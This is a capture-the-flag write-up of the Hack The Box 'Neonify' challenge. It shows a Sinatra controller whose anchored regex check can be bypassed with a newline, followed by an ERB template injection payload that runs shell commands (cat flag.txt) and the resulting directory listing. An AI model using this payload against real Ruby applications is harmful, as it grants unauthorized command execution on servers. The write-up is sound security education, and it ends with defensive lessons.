This post documents my process for solving the Neonify box on Hack The Box. This challenge revolves around a Ruby application vulnerable to Server-Side Template Injection (SSTI) via a regex newline bypass.

Challenge Description

It’s time for a shiny new reveal for the first-ever text neonifier. Come test out our brand new website and make any text glow like a lo-fi neon tube!

Solution

After looking at the source code, I noticed it was a Ruby application and suspected some kind of command injection. I didn’t immediately see the path, so I referred to a writeup and discovered that the challenge is about “ERB SSTI via newline regex bypass.” There’s very little public writeup info on this exact method, which made it a great learning opportunity.

Application Source Code

Key snippet from the controller:

class NeonControllers < Sinatra::Base

  configure do
    set :views, "app/views"
    set :public_dir, "public"
  end

  get '/' do
    @neon = "Glow With The Flow"
    erb :'index'
  end

  post '/' do
    if params[:neon] =~ /^[0-9a-z ]+$/i
      @neon = ERB.new(params[:neon]).result(binding)
    else
      @neon = "Malicious Input Detected"
    end
    erb :'index'
  end

end

There’s a regex intended to block malicious input, but it only allows numbers, letters, and spaces. However, the ^ and $ anchors, and the way newlines are handled, create an opportunity for a newline-based bypass.

Exploiting the SSTI (Server-Side Template Injection)

By submitting input that includes a newline ( ), the filter does not block content after the newline. The second line is directly injected into the template.

Example Payload:

a
<%=%x(cat flag.txt)%>

How to send:

  • The web form itself won’t interpret as a newline, so use a web proxy tool (e.g., Burp Suite) to submit a real multiline payload.
  • You may also need to URL-encode your submission.

Result: Submitting the payload (with a newline) executes the command and displays the flag (or directory listing if you use ls):

<h1 class="glow">a
Gemfile
Gemfile.lock
app
config
config.ru
flag.txt
public
</h1>

You can then read the flag with:

<%=%x(cat flag.txt)%>

Lessons Learned

  • Regex filters are not a substitute for real sanitization—newline handling can break even a “tight” regex.
  • Template injection vulnerabilities in Ruby (ERB) can be subtle and devastating.
  • Use of ERB.new(user_input).result(binding) is extremely dangerous.
  • Always test filters for newline and other “special character” bypasses, especially in CTFs and web security challenges.
  • Sometimes, reviewing public writeups and references is necessary to learn obscure or novel exploit methods.

Writeup based on my exploitation process and public references.